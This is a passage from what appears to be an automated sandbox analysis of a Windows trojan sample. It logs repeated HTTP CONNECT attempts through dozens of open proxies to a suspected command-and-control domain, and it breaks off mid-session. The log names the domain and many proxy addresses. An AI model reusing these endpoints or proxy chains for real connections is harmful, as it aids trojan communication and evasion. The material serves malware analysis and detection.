                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                666192.168.2.852112141.94.174.6165265828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.596338034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                667192.168.2.852135139.162.238.184607085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.601022959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.179198980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.695585966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.695386887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.695122004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.679613113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695183039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.695183039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:46.679399014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                668192.168.2.85202220.24.43.214805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.609143019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.945382118 CET319INHTTP/1.1 403 Forbidden
                                                                                Server: squid
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                X-Cache: MISS from cdn-fintech.info
                                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                Connection: keep-alive
                                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                669192.168.2.852234104.21.85.200805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.613014936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.700933933 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                670192.168.2.85203661.111.38.5805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.628878117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.919333935 CET507INHTTP/1.1 502 Proxy Error
                                                                                Date: Fri, 23 Feb 2024 13:28:28 GMT
                                                                                Server: Apache
                                                                                Content-Length: 341
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                671192.168.2.85215345.11.95.16560085828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.690052032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                672192.168.2.8517942.57.131.1941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.690879107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                673192.168.2.852054115.74.158.4010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.690995932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                674192.168.2.85174142.49.148.16790015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.706408024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.361447096 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                675192.168.2.852247188.164.193.178463925828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.713275909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.194928885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.876121998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.992064953 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.381556034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.615845919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.898238897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                676192.168.2.8521075.44.42.115583865828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.714850903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                677192.168.2.852141103.146.137.910815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.716629028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                678192.168.2.850362117.160.250.13888995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.725085020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.796009064 CET303INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:27 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 154
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                679192.168.2.851790171.247.241.15710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.728547096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                680192.168.2.851810107.180.101.18270535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.745709896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.816907883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898197889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.991930962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                681192.168.2.85224820.206.106.19281235828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.772607088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.984517097 CET319INHTTP/1.1 403 Forbidden
                                                                                Server: squid
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                X-Cache: MISS from cdn-fintech.info
                                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                Connection: keep-alive
                                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                682192.168.2.851821170.106.193.128300015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.772618055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                683192.168.2.852268188.164.193.178306635828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.783452034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.288611889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.882582903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.194988966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.491924047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.789197922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.195084095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882579088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                684192.168.2.852260185.165.46.20831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.839591980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.056050062 CET22INHTTP/1.1 502 ERROR


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                685192.168.2.851728203.154.39.146805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.839672089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                686192.168.2.85177023.254.231.55805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.839673042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.356152058 CET1011INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                Content-Length: 795
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 70 6f 73 74 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 33 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 67 20 50 48 50 2f 37 2e 34 2e 37 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at postmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                687192.168.2.852081222.243.201.15399925828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.839880943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.694915056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.847666979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.201782942 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                688192.168.2.85214339.99.144.43805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.840128899 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                689192.168.2.852098111.225.152.7480895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:26.840204954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.413360119 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                690192.168.2.852266185.49.31.20780815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
